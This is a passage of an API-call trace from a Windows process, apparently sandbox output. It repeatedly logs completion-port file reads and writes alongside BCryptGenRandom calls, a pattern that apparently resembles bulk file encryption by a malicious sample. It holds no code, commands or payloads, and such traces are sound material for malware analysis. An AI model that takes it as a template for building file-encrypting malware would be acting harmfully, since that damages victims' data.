lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0087.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0087.746] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.746] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.746] free (_Block=0x77d800) [0087.746] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.746] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.746] free (_Block=0x1ff1930) [0087.747] free (_Block=0x1ff1a40) [0087.747] free (_Block=0x77d908) [0087.747] WriteFile (in: hFile=0x3c8, lpBuffer=0x3e7011c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 1 [0087.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.788] WriteFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 0x0 [0087.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.807] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0087.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.840] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0087.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.879] WriteFile (in: hFile=0x3c8, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0087.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.887] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.888] CloseHandle (hObject=0x3ac) returned 1 [0087.888] free (_Block=0x3eb0078) [0087.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.900] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0087.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.088] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xbd0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0088.089] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.089] CloseHandle (hObject=0x3a0) returned 1 [0088.092] free (_Block=0x3d70048) [0088.092] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0088.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0088.106] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0088.106] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0088.106] free (_Block=0x1ff1e60) [0088.106] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0088.107] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0088.107] free (_Block=0x1ff1e60) [0088.107] free (_Block=0x1ff1930) [0088.107] free (_Block=0x77d800) [0088.107] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.112] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.112] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.128] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xbc3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0088.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.128] CloseHandle (hObject=0x3a0) returned 1 [0088.130] free (_Block=0x3d70048) [0088.130] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.140] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0088.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0088.141] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0088.141] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0088.142] free (_Block=0x1ff1e60) [0088.142] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0088.142] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0088.142] free (_Block=0x1ff1e60) [0088.142] free (_Block=0x1ff1930) [0088.142] free (_Block=0x77d800) [0088.142] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.143] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.144] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x4ab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.219] CloseHandle (hObject=0x3b8) returned 1 [0088.221] free (_Block=0x1ff1e60) [0088.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.264] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x120d, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0088.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0088.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0088.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0088.288] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.289] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.289] free (_Block=0x77d800) [0088.289] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0088.289] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0088.289] free (_Block=0x1ff1930) [0088.289] free (_Block=0x1ff1a40) [0088.289] free (_Block=0x77d908) [0088.289] WriteFile (in: hFile=0x3c8, lpBuffer=0x3db00ec, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0088.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0095.352] CloseHandle (hObject=0x1e8) returned 1 [0095.352] free (_Block=0x1ff1e60) [0095.352] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0095.352] WriteFile (in: hFile=0x334, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0095.352] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0095.917] WriteFile (in: hFile=0x330, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x4d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0095.917] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0095.930] ReadFile (in: hFile=0x13e0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0xb05, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0095.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0095.931] CloseHandle (hObject=0x1194) returned 1 [0095.931] free (_Block=0x1ff1e60) [0095.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0096.132] ReadFile (in: hFile=0x334, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0096.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0096.133] CloseHandle (hObject=0x334) returned 1 [0096.136] free (_Block=0x3ef0008) [0096.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0096.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0096.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0096.174] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0096.174] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0096.174] free (_Block=0x77d800) [0096.174] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0096.174] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0096.174] free (_Block=0x2071818) [0096.174] free (_Block=0x2071928) [0096.175] free (_Block=0x77d908) [0096.175] WriteFile (in: hFile=0x334, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0096.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0096.194] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.197] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0096.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0096.202] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0096.202] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0096.202] free (_Block=0x77d800) [0096.202] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0096.203] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0096.203] free (_Block=0x2071818) [0096.203] free (_Block=0x2071928) [0096.203] free (_Block=0x77d908) [0096.203] WriteFile (in: hFile=0x13e0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0096.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0096.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0096.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.265] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0096.268] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0096.268] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0096.268] free (_Block=0x77d800) [0096.268] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0096.268] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0096.269] free (_Block=0x2071818) [0096.269] free (_Block=0x2071928) [0096.269] free (_Block=0x77d908) [0096.269] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0096.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0096.281] ReadFile (in: hFile=0x330, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0096.282] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.351] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x6c30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0097.352] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.364] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xdce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0097.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.366] WriteFile (in: hFile=0x1194, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0097.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.367] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x5cb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0097.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.486] ReadFile (in: hFile=0x3a8, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x379f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0097.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.519] CloseHandle (hObject=0x3a8) returned 1 [0097.520] free (_Block=0x3e30078) [0097.520] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0097.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.538] 